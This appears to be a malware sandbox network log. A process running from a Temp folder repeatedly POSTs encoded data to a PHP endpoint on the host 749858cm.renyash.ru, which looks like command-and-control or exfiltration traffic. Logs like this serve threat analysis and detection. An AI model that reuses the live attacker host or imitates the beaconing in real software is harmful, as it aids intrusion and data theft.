Dec 17, 2024 00:08:05.532269955 CET	814	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pu%2FahO%2BDeyTvPe9O3J%2FXj2ASQ1oU3zABNUdZMhB3mACj7eLUDWdblTcAbMv5daZ%2BiMin2a4IH%2BSc%2BCUK32odgVeg%2BO58%2BAouJSK5JYN54hrBccPbVg4SlCD8S1CUdBU2p15YN4%2Bu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325553dce04327-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3095&min_rtt=1760&rtt_var=3330&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=117344&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49769	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:05.790370941 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:06.148086071 CET	1060	OUT	Data Raw: 58 55 46 53 5c 5f 51 5e 5d 5a 59 53 57 53 5a 54 5a 50 5f 5b 51 5b 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XUFS\_Q^]ZYSWSZTZP_[Q[RB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+2V>#303 ;-9;^<(7R&2*R>>[#="F"#Y
Dec 17, 2024 00:08:06.879050016 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:07.124248028 CET	797	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwjCXaC8HGNxYD9P5layOujg3gXofGYqDm0Fb9YgIr8tnhlYdK7HqFk0Rpo7cufeTxx9LlnQYHzsXKosa0Mdsx8LEj3efycGR9RjVrlq%2BYLDO7egJ9KkWDjFNUZRiGttEiwb4soz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32555df9720c88-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3704&min_rtt=1711&rtt_var=4629&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=82663&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49772	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:07.357893944 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:07.710887909 CET	1060	OUT	Data Raw: 58 53 46 53 59 51 51 58 5d 5a 59 53 57 5a 5a 55 5a 57 5f 5f 51 59 52 40 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XSFSYQQX]ZYSWZZUZW__QYR@]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y _+.>.;0#;%-#\": Y:9?X(( 1!.V*6 4,>8"F"#Y
Dec 17, 2024 00:08:08.444134951 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:08.694015026 CET	805	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhtMytS8GRMS74Xhty5X%2BhV7%2BNSWzZAxojDH6Byn%2BntP%2FEWye0DCc2PGdFiJkXsHbcB%2BQc5MWFroj7%2FAtlx%2BgpAbxu2AJLDBP95weIOAHKzbSzEyw4ovFqvbOsbtre7Qq5xrzCiR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325567c95c438d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2925&min_rtt=1733&rtt_var=3034&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=129558&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:08:08.885879040 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49778	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:09.125776052 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:09.476214886 CET	1060	OUT	Data Raw: 58 55 43 57 5c 5f 51 5d 5d 5a 59 53 57 5f 5a 5e 5a 54 5f 5d 51 5c 52 44 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XUCW\_Q]]ZYSW_Z^ZT_]Q\RD]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#(/=='3 ^'>+Z49$X.\;^?7V&2*-9]40)8"F"#Y 4
Dec 17, 2024 00:08:10.212064028 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:10.464339018 CET	806	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQAFk%2Fnkm8uTpAuYTaVttJL%2Fghvg0caMUVKwPHn6HjsRexuts%2FZvRruC%2FrtUWzWrIMLo4XLsUEgCOyzfHn3pZQYiP6ZS9HVcDO833mgrVAQPQ%2BcJQXhBp3KBhXrTVfvQ9JlzdYq2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325572dc218c1b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8749&min_rtt=1966&rtt_var=14303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=25963&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49784	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:10.521091938 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:10.868236065 CET	1936	OUT	Data Raw: 58 52 43 52 5c 5d 51 58 5d 5a 59 53 57 5a 5a 5e 5a 51 5f 5e 51 59 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XRCR\]QX]ZYSWZZ^ZQ_^QYRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Y+->+%3<X0>+\4\ _-?_+;?Q1!1*>)]7'?)"F"#Y
Dec 17, 2024 00:08:11.606230974 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:11.878938913 CET	956	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QtMNogWfXRk%2BuBj7zYOxutlRduUQ3eUwa7%2BC5a3IGWAHNsUeHjuMGJp9oux8YQXi%2FJQeqfzMaJlV8vjVK%2F%2FZVunkQpXliWV3ghSRqE0Pyu0YFSqIVb5ctB%2Ft17f9AJyTGOKDUkOe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32557b8f5c41df-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4209&min_rtt=1762&rtt_var=5556&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=68403&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 3a 0c 27 2e 2d 01 20 2e 24 0a 2a 59 33 0b 24 1d 25 17 2d 2c 28 42 31 23 3a 5d 32 0c 26 06 25 34 28 06 20 57 23 0e 30 0f 28 52 25 37 23 5d 01 1b 27 43 24 3d 29 01 29 2f 04 10 26 20 26 08 31 3d 27 44 26 0a 27 0d 25 0a 3f 10 22 01 21 01 3b 0b 39 03 3f 11 33 1b 2d 33 31 5a 20 04 21 52 0d 13 21 0a 24 38 25 02 30 32 2b 5a 20 0d 09 59 21 24 01 57 33 2c 27 55 24 2a 24 5c 24 01 21 02 27 3b 28 05 29 16 00 1e 37 22 20 56 3f 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:'.- .$Y3$%-,(B1#:]2&%4( W#0(R%7#]'C$=))/& &1='D&'%?"!;9?3-31Z !R!$8%02+Z Y!$W3,'U$$\$!';()7" V? R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49785	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:10.641555071 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:10.991776943 CET	1060	OUT	Data Raw: 58 53 46 50 59 59 54 59 5d 5a 59 53 57 5e 5a 57 5a 52 5f 58 51 53 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XSFPYYTY]ZYSW^ZWZR_XQSRB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#(6=(0 8Y'-\ -\'^(+2:).!^ '3Z="F"#Y 0
Dec 17, 2024 00:08:11.728331089 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:11.981856108 CET	799	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jZcc15p7aossqhjFfXp80a2CmVFmnPiZaoxmCFYKhobCFPKs6hcTLqrdvgapiv2jl7ddQaGWQLTCZj4lBGBavAE8NntL%2FnB4coEHhVEvF2God05j8YeirACQUGqNnG6nELU%2BSGR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32557c5d59c345-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4412&min_rtt=1572&rtt_var=6271&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=60084&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49790	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:12.217202902 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:12.570029974 CET	1060	OUT	Data Raw: 5d 50 46 56 5c 5a 54 5e 5d 5a 59 53 57 5e 5a 50 5a 54 5f 5a 51 5d 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]PFV\ZT^]ZYSW^ZPZT_ZQ]RG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y X+<"?>?'?3<#\+.*Y<8<&!>]#Q,)"F"#Y 0
Dec 17, 2024 00:08:13.302424908 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:13.560295105 CET	800	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tMzGEjo65qF19r58lcAJ9ykY3vEmhPneTrG5SETzU2uqEjtsisT6Kt7Lw5Et0b0wWOp8IfFvOa4S5ysOp%2BbheFi0xCqosuUfp8pDjC28%2BXHPTAVTeQ715EiZFO1BO9fQs4bivDGh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255862cf1c33e-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7034&min_rtt=1775&rtt_var=11185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=33293&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49792	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:13.811351061 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:14.163664103 CET	1060	OUT	Data Raw: 5d 51 43 5c 5c 5f 51 59 5d 5a 59 53 57 5a 5a 54 5a 50 5f 58 51 52 52 44 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]QC\\_QY]ZYSWZZTZP_XQRRD]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y [+Y1*=?\03<X%>3[4',94(++V&&>)^47?>"F"#Y
Dec 17, 2024 00:08:14.898664951 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:15.159926891 CET	802	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=76dW%2BzuNLhGxT5lHdJkSfgKulESSf36IF9SSnZHJD84aICpFHTA3gEpruYBJOiwnL7c8HqdFr5OOr0dxR4fKSsK2p9QpGnxT8rD7AzdgxL%2BWL2HJUKCpI4fZdWH2r0AYK3E4k%2BNc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255902f8142bd-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8773&min_rtt=1823&rtt_var=14584&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=25423&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49798	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:15.416008949 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:15.773102999 CET	1060	OUT	Data Raw: 5d 50 43 5d 5c 58 51 59 5d 5a 59 53 57 5a 5a 55 5a 5e 5f 5e 51 5c 52 43 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]PC]\XQY]ZYSWZZUZ^_^Q\RC]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y _)?6=[/\$0]'>/ 7-Y+(?R%1.=>]77>"F"#Y
Dec 17, 2024 00:08:16.514914036 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:16.763830900 CET	797	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdbXK5Rvpd5WZ7RQjkIYE3HBJED0RPON2uVEk9Qo3UA52HJI9XZw9BqEaVLZdKN62qD%2BgOAZqSpaJRM2oUuqrCJ7rc2QPj2TjcGT0f2YyzdmZgC6317Gy85sLNUjFCc0UqgaYug9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32559a3d56efa7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4128&min_rtt=1966&rtt_var=5062&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=75785&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49804	104.21.38.84	80

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:16.998626947 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:17.351353884 CET	1060	OUT	Data Raw: 58 5b 43 50 5c 5a 51 5f 5d 5a 59 53 57 5c 5a 52 5a 52 5f 5c 51 5f 52 46 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: X[CP\ZQ_]ZYSW\ZRZR_\Q_RF]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y <,>><'$[+[#'9)'?;%T!(>*#$ ="F"#Y
Dec 17, 2024 00:08:18.085788012 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:18.321352005 CET	800	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=robnxRaYY5jl5qX1JepmO86mNebUhQElXX8z7t%2FEl38P5K4rvYuPjXOlB7v8732gVz7lkjh8A%2FKf1rVCLKsWXADO9IURJbOKVOpbdsKK1dedzXHWRET0SK28WVa4Jb41BwteNlLy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255a40fd14340-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2912&min_rtt=1760&rtt_var=2965&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=132944&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49805	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:17.003487110 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:17.351443052 CET	1936	OUT	Data Raw: 5d 51 46 51 5c 5d 54 5e 5d 5a 59 53 57 52 5a 53 5a 52 5f 5c 51 5d 52 40 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]QFQ\]T^]ZYSWRZSZR_\Q]R@]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#?R)=<'<^'./]":4,9;Y(0%2:9] 7 *"F"#Y
Dec 17, 2024 00:08:18.088913918 CET	25	IN	HTTP/1.1 100 Continue
